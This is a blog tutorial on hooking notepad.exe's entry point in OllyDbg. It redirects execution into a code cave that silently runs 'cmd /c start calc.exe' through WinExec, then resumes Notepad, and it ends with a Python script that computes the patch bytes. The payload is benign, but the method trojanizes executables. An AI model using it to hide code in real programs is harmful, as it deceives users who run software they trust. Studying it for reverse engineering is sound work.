Sunday, April 8, 2012
Manual Code Injection
Open notepad.exe in OllyDbg. When it pauses at the entry point, highlight the code from the entry point up to and including the first CALL you see, right-click, and copy the highlighted lines to a text editor. You will need them later to restore what the jump overwrites. The first line is the original entry point (OEP).
Example:
0100739D > $ 6A 70 PUSH 70 (OEP)
0100739F . 68 98180001 PUSH notepad.01001898
010073A4 . E8 BF010000 CALL notepad.01007568
Scroll down past the end of the code until you reach the unused, zero-filled bytes (displayed as DB 00). This is the code cave. Select as many of these bytes as you need (the string below is 22 bytes including its terminating NUL), right-click, choose "Binary" then "Edit", type the command line into the "ASCII" box and click "OK". Then press Ctrl+A (Analyse code) so OllyDbg re-interprets the bytes and shows them as a string. Make a note of the address where the string starts ( 01008748 ); the WinExec call will take it as its lpCmdLine argument.
Example:
01008748 ASCII “cmd /c start calc.exe”
Below the string, leaving a gap of a few bytes so its NUL terminator is not overwritten, select an empty line, press Space (or right-click then "Assemble") and enter the instructions one at a time. WinExec(lpCmdLine, uCmdShow) is stdcall, so the arguments are pushed right to left: uCmdShow (0 = SW_HIDE) first, then the string address. Note that PUSH 0 is two bytes and PUSH with a 32-bit immediate is five, so the addresses advance by 2 and 5, not by 1; OllyDbg assembles CALL WinExec as an indirect call through the import table, which takes six bytes.
Example:
0100877D PUSH 0 (uCmdShow; 0 = SW_HIDE)
0100877F PUSH 01008748 (lpCmdLine = address of the string)
01008784 CALL WinExec
In the CPU window right-click, then select "Go to" then "Origin". Origin is the current EIP, and because the program has not run yet that is still the original entry point. Double-click the PUSH 70 at the entry point, replace it with a jump to the first instruction of your stub, then click "Assemble" again.
Example:
JMP 0100877D
Now compare the code you copied to your text editor with what is at the OEP after the jump. Two instructions are gone: a JMP with a 32-bit displacement is five bytes, so it overwrote both the two-byte PUSH 70 and the first three bytes of the five-byte PUSH notepad.01001898. The two leftover bytes are shown as junk but are never executed, because the jump leaves before them. Both instructions have to be re-executed in the cave before control returns.
Example:
PUSH 70
PUSH notepad.01001898
Highlight the jump you just wrote and press Enter to follow it to the stub. Directly under the CALL WinExec (don't skip a DB 00: when WinExec returns, execution falls through into whatever bytes come next, and a stray 00 00 would execute as ADD [EAX],AL and crash), highlight three empty lines and press Space. Enter the two instructions the jump destroyed, followed by a jump back. The jump goes to the address of the "CALL notepad.01007568", the first instruction the hook left intact, so that CALL still executes in its original place; do not copy the CALL itself into the cave.
Example:
PUSH 70
PUSH 01001898
JMP 010073A4
Now right-click in the CPU window and select "Copy to executable" then "All modifications". Click "Copy all". The file window that opens can be closed; OllyDbg will then ask whether you want to save the changes. Click "Yes" and save under a new name. Run the new executable: it starts Calculator and then continues into Notepad as normal. One caveat: WinExec clobbers EAX, ECX, EDX and the flags. That is harmless here because the entry code does not depend on the register values the loader hands it, but when hooking somewhere in the middle of a function wrap the call in PUSHAD/PUSHFD and POPFD/POPAD so the original code sees the state it expects.
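The same hook, worked through at the byte level as an added example (this is not code from the original post). It takes the post's entry-point bytes, cave address and command line, works out which instructions a five-byte JMP destroys by decoding their lengths instead of eyeballing the listing, lays out the stub with the corrected addresses, and optionally adds the PUSHAD/POPAD wrapper the post leaves out. IAT_WINEXEC is an assumed placeholder for the import-table slot OllyDbg resolves when you assemble CALL WinExec (look the real one up with Ctrl+N); every other value is from the post.

```python
"""Byte-level view of the entry-point hook built above.

Added example, not code from the original post. The OEP bytes, the cave
address 01008748, the stub address 0100877D and the command line are the
post's values; IAT_WINEXEC is a placeholder, not Notepad's real slot.
"""
import struct

OEP = 0x0100739D
OEP_BYTES = bytes.fromhex("6A70 6898180001 E8BF010000")  # PUSH 70; PUSH 01001898; CALL 01007568
CAVE = 0x01008748            # where the ASCII string goes
STUB = 0x0100877D            # where the WinExec stub goes
CMDLINE = b"cmd /c start calc.exe"
IAT_WINEXEC = 0x01001100     # assumption: placeholder import-table slot for WinExec


def insn_len(code: bytes, off: int) -> int:
    """Length of the x86 instruction at code[off]. Only the opcodes that
    occur at Notepad's entry point and in the stub are handled."""
    op = code[off]
    if op == 0x6A:                                  # PUSH imm8
        return 2
    if op in (0x68, 0xE8, 0xE9):                    # PUSH imm32, CALL rel32, JMP rel32
        return 5
    if op == 0xFF and code[off + 1] == 0x15:        # CALL DWORD PTR [imm32] (IAT call)
        return 6
    raise ValueError(f"opcode {op:#04x} at offset {off} not handled")


def jmp_rel32(src: int, dst: int) -> bytes:
    """Encode JMP dst as E9 rel32; rel32 is relative to the end of the jump."""
    return b"\xE9" + struct.pack("<i", dst - (src + 5))


def rel32_target(code: bytes, off: int, base: int) -> int:
    """Absolute target of the E8 (CALL) or E9 (JMP) rel32 at base + off."""
    if code[off] not in (0xE8, 0xE9):
        raise ValueError("not a rel32 CALL/JMP")
    return base + off + 5 + struct.unpack_from("<i", code, off + 1)[0]


def displaced_by_hook(code: bytes, base: int, hook_len: int = 5):
    """Instructions destroyed by a hook_len-byte overwrite at base, plus the
    address of the first instruction left intact (the jump-back target)."""
    off, moved = 0, []
    while off < hook_len:
        n = insn_len(code, off)
        moved.append(code[off:off + n])
        off += n
    return moved, base + off


def build_patch(oep, oep_bytes, cave, stub_at, cmdline, iat_winexec,
                preserve_regs=False):
    """Return the byte strings to write (hook at oep, string at cave, stub at
    stub_at), the resume address, and the address of every stub instruction."""
    moved, ret = displaced_by_hook(oep_bytes, oep)
    hook = jmp_rel32(oep, stub_at)
    hook += b"\x90" * (sum(map(len, moved)) - len(hook))   # NOP the torn tail bytes
    string = cmdline + b"\x00"
    if cave + len(string) > stub_at:
        raise ValueError("string would run into the stub")
    parts = []
    if preserve_regs:                    # not in the post; needed when hooking mid-function
        parts += [("PUSHAD", b"\x60"), ("PUSHFD", b"\x9C")]
    parts += [("PUSH 0", b"\x6A\x00"),                                   # uCmdShow = SW_HIDE
              ("PUSH cmdline", b"\x68" + struct.pack("<I", cave)),       # lpCmdLine
              ("CALL [WinExec]", b"\xFF\x15" + struct.pack("<I", iat_winexec))]
    if preserve_regs:
        parts += [("POPFD", b"\x9D"), ("POPAD", b"\x61")]
    parts += [(f"orig{i}", m) for i, m in enumerate(moved)]   # re-execute what the JMP ate
    addr, layout, stub = stub_at, {}, b""
    for name, b in parts:
        layout[name] = addr
        stub += b
        addr += len(b)
    layout["JMP back"] = addr
    stub += jmp_rel32(addr, ret)         # resume at the first untouched instruction
    return {"hook": hook, "string": string, "stub": stub, "return": ret, "layout": layout}


def notepad_patch(preserve_regs=False):
    return build_patch(OEP, OEP_BYTES, CAVE, STUB, CMDLINE, IAT_WINEXEC, preserve_regs)


if __name__ == "__main__":
    p = notepad_patch()
    print(f"{OEP:08X}: {p['hook'].hex(' ')}   (was {OEP_BYTES[:7].hex(' ')})")
    print(f"{CAVE:08X}: {p['string']!r}")
    for name, a in p["layout"].items():
        print(f"{a:08X}: {name}")
    print(f"resume at {p['return']:08X}; original CALL goes to "
          f"{rel32_target(OEP_BYTES, 7, OEP):08X}")
```

The layout it prints reproduces the post's addresses (PUSH 0 at 0100877D, the string push at 0100877F, the CALL at 01008784) and the jump back to 010073A4, and decoding the CALL at the OEP confirms it really targets 01007568. With preserve_regs=True everything shifts by two bytes, which is why the addresses in the stub should always be read from OllyDbg after assembling rather than written down in advance.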
by
Huxley